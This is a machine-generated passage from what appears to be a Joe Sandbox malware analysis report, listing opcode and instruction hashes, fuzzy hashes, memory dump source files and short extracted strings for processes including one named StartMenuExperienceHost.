              • Opcode ID: 5180b49e14fd2bc91d9b9be6843dcc8f7f47d4d1bb849863d4fc12b9e8e3d54c
              • Instruction ID: a87c264b3b5209b87fb63f1a7a08ee3d074c8abe732fd05b46c4ffe189c5d86e
              • Opcode Fuzzy Hash: 5180b49e14fd2bc91d9b9be6843dcc8f7f47d4d1bb849863d4fc12b9e8e3d54c
              • Instruction Fuzzy Hash: 6301E870A4451ECBEBB4DB04D890BE8B7B1EB94351F1086EA840EE7744DA786EC59F80
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction ID: 5b803ac11d9aabc30c27f4d8622695e83e30d09d994a7db27dc7c0deae7cc883
              • Opcode Fuzzy Hash: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction Fuzzy Hash: BAF0CD3090D3898FEB599F2488A92B93FB4BF06200F8548FAD619C61D2DA7CA454C791
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0cbe0f2887318cf481219d87190f68d334bc087e1e5d49ed6815b7ddc8ea2e6d
              • Instruction ID: d0b3e812ab31591adb28e47968f3d050ea198338d031c78dcde1fff9319a5b41
              • Opcode Fuzzy Hash: 0cbe0f2887318cf481219d87190f68d334bc087e1e5d49ed6815b7ddc8ea2e6d
              • Instruction Fuzzy Hash: D2F05E70A1860E8EEBC4EF6898592FE76A0FF15301F40053AE81DC2190DF346550C780
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              • String ID:
              • API String ID:
              • Opcode ID: a641320859cfa6f165fdcd350d79ff2a850d6367a3bbfa6d4954b0510067f1ee
              • Instruction ID: c2c35bad0d996004976aa6883ce3d6115d3a779a463846ee4f134c065d43325e
              • Opcode Fuzzy Hash: a641320859cfa6f165fdcd350d79ff2a850d6367a3bbfa6d4954b0510067f1ee
              • Instruction Fuzzy Hash: DF01F172B1851ACEE714EF78E8A51FD73A4EF02325F40853BE148C6092CA7879589680
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 88511828cd484e47790b9b8c87e643c975f4cf2bb1594ade0ef01b45edde3ab0
              • Instruction ID: 40abc2b44694dcdd7a9089dda6436f692d3991318cbf2cba8e0f197893451827
              • Opcode Fuzzy Hash: 88511828cd484e47790b9b8c87e643c975f4cf2bb1594ade0ef01b45edde3ab0
              • Instruction Fuzzy Hash: CC11A170A1C64D8FDB94EF64C4A92BD7BF1FF1A310F0105BED50AD2192DA39A550C780
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef18bf11e89655c25044b684faacdbc83f6b698c31713dfa3ad0b0d22dd0b325
              • Instruction ID: de99f14429cff57bc23cee0823b25347c55763869c6b0dfbf635c9f2859f81b4
              • Opcode Fuzzy Hash: ef18bf11e89655c25044b684faacdbc83f6b698c31713dfa3ad0b0d22dd0b325
              • Instruction Fuzzy Hash: 2C01D2B1A0868A8FE7D5FB6888985A97BE1EF5A310F0544B6D50CCB093EE3CF5408381
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 25a16412741221192453f7a5d7119c954cc927603058ba4f6a3d9236414d7484
              • Instruction ID: 5dc239c587d8547512951bcf628565c92bafb596b881b7685e4cf19300c2a858
              • Opcode Fuzzy Hash: 25a16412741221192453f7a5d7119c954cc927603058ba4f6a3d9236414d7484
              • Instruction Fuzzy Hash: E301F772B1C54ADEE710DA749CA51FE77A4EF06301F40447AE42CC2081DAB87614E690
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2f1a5e01bc22a0c5255d2a01fc85438bfcb7af72a2425f4d44f6e6f519eb7945
              • Instruction ID: 1df323b413f0a72f378b47a78bf73afa8ed01b02ee63c594f01a38c32f316e6d
              • Opcode Fuzzy Hash: 2f1a5e01bc22a0c5255d2a01fc85438bfcb7af72a2425f4d44f6e6f519eb7945
              • Instruction Fuzzy Hash: 9B019E71A0D6498FE792AB7484A91E97BE1EF4B310F4504B6C508C60A2DA3CB444CB81
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b7b2b32a3582718ed8739f7000a559596a7400ed7ef6fdf374a4fa6ab17143c8
              • Instruction ID: 1426afb5509305a7ccb211317861d11ae2c32fab1ebe50e5aee3f800cb1f9d2e
              • Opcode Fuzzy Hash: b7b2b32a3582718ed8739f7000a559596a7400ed7ef6fdf374a4fa6ab17143c8
              • Instruction Fuzzy Hash: C0016D70A1450ECEEB98FB64C4A86BA73A5FF19315F10487ED50ED25D1DE3DB550C640
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10206a194cf4529626fb0690d2ced1f6bbc6b56376ce71695ed843909abd8c2e
              • Instruction ID: 2b5cdbb314eb340c7ef4bae348a5183bb502fe89196041c1b622a9a2bd007dad
              • Opcode Fuzzy Hash: 10206a194cf4529626fb0690d2ced1f6bbc6b56376ce71695ed843909abd8c2e
              • Instruction Fuzzy Hash: 3A016D70A18A0ECAEB99EB64C4A82B973A1FF1A315F10487ED40ED21D1DF3EB550D680
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13b001e2f5e83704b3f54312c1312e99ae14c6f45446a586de8fef05eac42634
              • Instruction ID: 093e0d5e4997fc28e4df2a544cf45869b4d3151970d80d9dfa6a28f130e365fd
              • Opcode Fuzzy Hash: 13b001e2f5e83704b3f54312c1312e99ae14c6f45446a586de8fef05eac42634
              • Instruction Fuzzy Hash: 13016D71A0964ACFEB94AF68C4A92FA7BE0FF06310F00047AE91CC2151EB7C6560E780
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7f6827ebbf616c0a493045bea16f47d85230498fb6c9a05c441342f8fddb80ef
              • Instruction ID: 58b4bc4db42bce1e0c8e3f2cfcb7ac5be1ba1b0c0e8a749b731431a0f126d3da
              • Opcode Fuzzy Hash: 7f6827ebbf616c0a493045bea16f47d85230498fb6c9a05c441342f8fddb80ef
              • Instruction Fuzzy Hash: 0BF04F75B5C60EDEEBA1EB7884DA5E977E2EF5B310F0048B2D609C2052EE3CB554D680
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 769aa6c9e9b09ab6ebabccba1e282fc72c005755c6d65638ddda5d990ef3f65b
              • Instruction ID: 34bf149a8ad42c491216f2b0bbffc0ab737ec8963901c0439e5220849291bdca
              • Opcode Fuzzy Hash: 769aa6c9e9b09ab6ebabccba1e282fc72c005755c6d65638ddda5d990ef3f65b
              • Instruction Fuzzy Hash: 06F0C27190E3898FEB99AF2488B52A93B65FF07210F4504BAD609C65D2DB3CB414C791
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 197d385a76f99e7ef28cd1d064e66e81216ec0b48007c5aeaf1a41e2ce6fb45a
              • Instruction ID: a68b6243881e0b636dfb4be9146e8a7ddd419f499cbb8b3ec8e953a6dd57be26
              • Opcode Fuzzy Hash: 197d385a76f99e7ef28cd1d064e66e81216ec0b48007c5aeaf1a41e2ce6fb45a
              • Instruction Fuzzy Hash: 85F05E70A1850E8EEB84EF6898582FE76A0FF16304F40453AE91DC2290DF786550C781
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2cf91c1ef79bce41fb7b4995ea95f499ec608fa871a69c6569096fada2f4fc8
              • Instruction ID: 6bf333d018652f39b065d39ff357f37c345d7bbfdec964a06f09fb6390295b53
              • Opcode Fuzzy Hash: f2cf91c1ef79bce41fb7b4995ea95f499ec608fa871a69c6569096fada2f4fc8
              • Instruction Fuzzy Hash: F7F0F670A0D78A8FEB99AF2488692B93BA1BF06310F0005BAD50DC20D2DB3DA414C340
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction ID: b7c6ad8af65af4d2be1ada6f19ec96c8f7933978f31fa5c7ffd297754e00fd81
              • Opcode Fuzzy Hash: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction Fuzzy Hash: 89F05E70A0865ACFDB60EB14C8907A873A2FB51320F0002AAC54AD3292DFBC29859B41
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24e3bd2f08a1b5c816ae065b5a375c273a4dfdfaaae09844531df1f311ea2da4
              • Instruction ID: 371ff6bc888ee2b3f46d1b3e64a1aff2b2daa0411301d8454f64a53f19239d1f
              • Opcode Fuzzy Hash: 24e3bd2f08a1b5c816ae065b5a375c273a4dfdfaaae09844531df1f311ea2da4
              • Instruction Fuzzy Hash: 1AD0126094C41BC9DBA0E614C494EFC72659B16300F2095B1810DD2082DD3C79C46B80
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: $"$=$C$Y$[$]
              • API String ID: 0-3933176780
              • Opcode ID: 8fbcbdb5e738ad5c909ba9bcf5f59c111f8c688160aba50262e2c24df3cc0ea5
              • Instruction ID: 77f193a7cd8110fb0f099e9adc04f857b777fb7c3ac60b301325a9a71fb20258
              • Opcode Fuzzy Hash: 8fbcbdb5e738ad5c909ba9bcf5f59c111f8c688160aba50262e2c24df3cc0ea5
              • Instruction Fuzzy Hash: 1F41B6B0E1962ACFDBA4DF14C8947E9B7B2AF15315F0004FAD10DE6281DB786A84DF81
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 300ce7fd3b16ebd53b88995034bc8dfbd0ed0aa261b355fd22eb831715ddde08
              • Instruction ID: 5c46c938763b2a04d5931f1aae643ecc08c79256f7b65c447ef74c6f83e020bc
              • Opcode Fuzzy Hash: 300ce7fd3b16ebd53b88995034bc8dfbd0ed0aa261b355fd22eb831715ddde08
              • Instruction Fuzzy Hash: 09D1C1A7B0C6629FE31166ACB8A50FD7F50EF87375B488077D38CCA093995D344A92E1
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 82505169faa8bca1d526ec66376dd3874ab99d401ea371fe4c66180f19e09902
              • Instruction ID: 621f4bd878d4d76512a152066a28db311d3c8843304f65cab8855c10da2036a7
              • Opcode Fuzzy Hash: 82505169faa8bca1d526ec66376dd3874ab99d401ea371fe4c66180f19e09902
              • Instruction Fuzzy Hash: 3DA17071A1894E8FEB94DB6888657BD7BE1FF5A314F80417AD00ED32D6DBA86801C781
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: Ne4$p\e4
              • API String ID: 0-493680112
              • Opcode ID: 32cb44f26e56faba9843b2f03039aeef8ac2f430dc284cf39ce87f9d8a1a4bed
              • Instruction ID: 42fbc716a934552eb80363aa89f7c185706f5375bee961c8c8599e10161a2427
              • Opcode Fuzzy Hash: 32cb44f26e56faba9843b2f03039aeef8ac2f430dc284cf39ce87f9d8a1a4bed
              • Instruction Fuzzy Hash: 4D91A7B1A18A8A8EE7A99F6488B53F87AE1FF55304F4481BED10DD21D2CD7C6844DB81
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: S_H
              • API String ID: 0-1697064872
              • Opcode ID: 36c2208f82423bb57b7ac8ef5165c87fa7ba49755611940c1b0db009d9b24113
              • Instruction ID: 14c8dedf3861320911f7bc9fe18787814aae8ee4868f52792f71442c6aca9339
              • Opcode Fuzzy Hash: 36c2208f82423bb57b7ac8ef5165c87fa7ba49755611940c1b0db009d9b24113
              • Instruction Fuzzy Hash: 0331DCB1E1891D8FEB94EB5898E96FCBBB1FF99300F905139D10DE3281DE6868419B40
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: 8fc32dbf1613740f6220828429e7ac61c37a0a8dddbaa7a52d1cb166415df818
              • Instruction ID: abace2377021ba26c03cef48496a65e42d64c6b6a4d86af9298b3db5b66f6290
              • Opcode Fuzzy Hash: 8fc32dbf1613740f6220828429e7ac61c37a0a8dddbaa7a52d1cb166415df818
              • Instruction Fuzzy Hash: B231E375E08629CEEBA4DF58C8A57E9B7B1FB55311F1041AAD40DE3282CB386984DF80
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: 8vf4
              • API String ID: 0-1454646052
              • Opcode ID: 17076b7438b46a652ea36fdfec8b0c6b10dc242f00e6a92cdd033571c7d949e8
              • Instruction ID: ef87560fcf6257b6d9894968cc0302f94b52bb707862869fd321fcc36d108dd0
              • Opcode Fuzzy Hash: 17076b7438b46a652ea36fdfec8b0c6b10dc242f00e6a92cdd033571c7d949e8
              • Instruction Fuzzy Hash: 9B11C471A1854E8FE790EF68C8992BD7BE0FF5A310F818576D509D61A2EE78F540C780
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: pyf4
              • API String ID: 0-55055563
              • Opcode ID: b73973cde54ab16dce5e9b5edeb0c5eb957b25399b35fe668237c897bd5eeced
              • Instruction ID: 0fc5bbc5e3f7537775da4607ec4651c46d8b69f8adb189786dd38c9a8c50dad8
              • Opcode Fuzzy Hash: b73973cde54ab16dce5e9b5edeb0c5eb957b25399b35fe668237c897bd5eeced
              • Instruction Fuzzy Hash: 0111C471B1864A8EEB999F64C8B82B97BE0FF56304F4444BEC50AD61D2DE78B540D740
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: pyf4
              • API String ID: 0-55055563
              • Opcode ID: 456ebfd7c8b36c5529f8bd651b8b4eae582313d757d438ea781da456155e659e
              • Instruction ID: d3e6bc0b44a9eeddaebfe8e4ff367c3f4be4e45becf4073acaf9dd6b59442389
              • Opcode Fuzzy Hash: 456ebfd7c8b36c5529f8bd651b8b4eae582313d757d438ea781da456155e659e
              • Instruction Fuzzy Hash: 6AF0F470F0954E8AEB949BA489A82F97BE0FF46204F40403AD60AC11C2DE687510D380
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: P
              • API String ID: 0-3110715001
              • Opcode ID: aa5f2709edc1ff099110456efe0fc1d0cf198aed2c6df415270028bfc51d32f0
              • Instruction ID: 2dc3810ed77db75c7a3fa5647593b5fca0b5aa7004ed7bbc77584dedd2c65791
              • Opcode Fuzzy Hash: aa5f2709edc1ff099110456efe0fc1d0cf198aed2c6df415270028bfc51d32f0
              • Instruction Fuzzy Hash: 34F0A5B0D1962D8EEBA5DF1488A07F8BAF5AF19301F4040E9D50CE2281CB786B90DF80
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eecd76162ff9fb78d536102e02910e9432def1aa727b38d4e2039d4aeb08a0a0
              • Instruction ID: 6efd26ef909ce8f2cdb101a2e759160e73c22e5b431f655dff5de72b4dd6683e
              • Opcode Fuzzy Hash: eecd76162ff9fb78d536102e02910e9432def1aa727b38d4e2039d4aeb08a0a0
              • Instruction Fuzzy Hash: 1E91D071B0CA498FDB58DE188CA55B97BE2FF99304B14857AE54DD3382CE78F8028781
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dad9e0e125d88a5e116f41af3b2977831c5ea9a536164e998daaf6601b151b0a
              • Instruction ID: 9a2575ecf15146ae193a9d128fa16f0078c956c2cdb6da2ed8c957558b0ffb11
              • Opcode Fuzzy Hash: dad9e0e125d88a5e116f41af3b2977831c5ea9a536164e998daaf6601b151b0a
              • Instruction Fuzzy Hash: 7E91F671F099498EEB54EB248CA5BF877A1FF56310F4082B9D10DE7192DE78B9458B80
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3aeaec8fec73f5d61592decbc41b48e3f5c695d2778cb51805f48396b528ba85
              • Instruction ID: 47cccfe0e9bd513ea87889deee09d0c0a50d6f1ff55774711daf9d1e3015719e
              • Opcode Fuzzy Hash: 3aeaec8fec73f5d61592decbc41b48e3f5c695d2778cb51805f48396b528ba85
              • Instruction Fuzzy Hash: 7E615DB0E0851EDBEBA4DB54C8AA7BD76B1FF56301F0041BAD10DE2292DF386985DB41
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6785f2a546869c4dd8055545959a1af11610f3fe38b71a519f5eb646dd6eb374
              • Instruction ID: 2a00214a0df9d1887af556a408708de168c59ab65a2ff8d5c646dae928d41ec8
              • Opcode Fuzzy Hash: 6785f2a546869c4dd8055545959a1af11610f3fe38b71a519f5eb646dd6eb374
              • Instruction Fuzzy Hash: 1151E370B18A498FDB58DE1888A45BA77E2FF99305B14857ED54EC3381CE74B802CBC1
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9257d500801e79066431664a3c98d7c3dccf1de74e5d04e7c66978f41ba317b
              • Instruction ID: 9620c6c263215df24e87579f116ddac0f7c855f221414d04b5724e81a0013cd5
              • Opcode Fuzzy Hash: d9257d500801e79066431664a3c98d7c3dccf1de74e5d04e7c66978f41ba317b
              • Instruction Fuzzy Hash: 31512BB0E18519CFEB54DB94C9A46FDBBF1FF49301F904039D509E7292DA786944DB80
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3600f61c375ca2f81a32359140225c62e3d19a737561b0adb29d3f37d32e040f
              • Instruction ID: 2dc1e25ac7d02642c05006cdb2be585046131c08a050055b08c7cf0207920850
              • Opcode Fuzzy Hash: 3600f61c375ca2f81a32359140225c62e3d19a737561b0adb29d3f37d32e040f
              • Instruction Fuzzy Hash: B941D173B089238BE710BBACB8661FD7B54EF46339B548137D24CDA083DA6C309696D4
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9cd87f5a5af54cdd6a182d1656a2a53e17b6126ba0ffc689d8edb44ef240395a
              • Instruction ID: 6edaffe857f638304264da79a097e8f851b3969580cf671523223c3104d4d404
              • Opcode Fuzzy Hash: 9cd87f5a5af54cdd6a182d1656a2a53e17b6126ba0ffc689d8edb44ef240395a
              • Instruction Fuzzy Hash: C941D163B089278BE710BBACB8661FD7F54EF46339B548137D20CDA093DA6C309692D4
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 64b84ae0a9cbaa87fcdc930aba48b62743007d009cba9f03a4759e650fbcb747
              • Instruction ID: 86fee76ab8488e91287b4ccc88ed756a4e6173cf10a4d2786ab55e3b6d2d64f9
              • Opcode Fuzzy Hash: 64b84ae0a9cbaa87fcdc930aba48b62743007d009cba9f03a4759e650fbcb747
              • Instruction Fuzzy Hash: 7D41B163B089278BE710BBACB8661FD7B54EF46339B548137D20CDA093DA6C309596D4
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 82755f23926f09fdefc6309786a0553958a40a51085dea883372a5d31b98e771
              • Instruction ID: 26ac090c1842ec1a2e0272785c021fb54efdefeb484f7190f44ecd2ebf829b0e
              • Opcode Fuzzy Hash: 82755f23926f09fdefc6309786a0553958a40a51085dea883372a5d31b98e771
              • Instruction Fuzzy Hash: 06418971B0DA4A8FE355DB7888A51B87BD0FF87300F4584BAD11DC7292DE6CB8018381
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4fd90d426a46310d33f2bf8c0b4e9597e929953089d8aea735655bf9d111e2fe
              • Instruction ID: fd253f087cac42c38fec4ed5e85d8c5c607ec830270c09c68181465716eaa543
              • Opcode Fuzzy Hash: 4fd90d426a46310d33f2bf8c0b4e9597e929953089d8aea735655bf9d111e2fe
              • Opcode Fuzzy Hash: 510ad2e13099be6484119ef51b342a86803a415798627bbfffe248cc848083d1
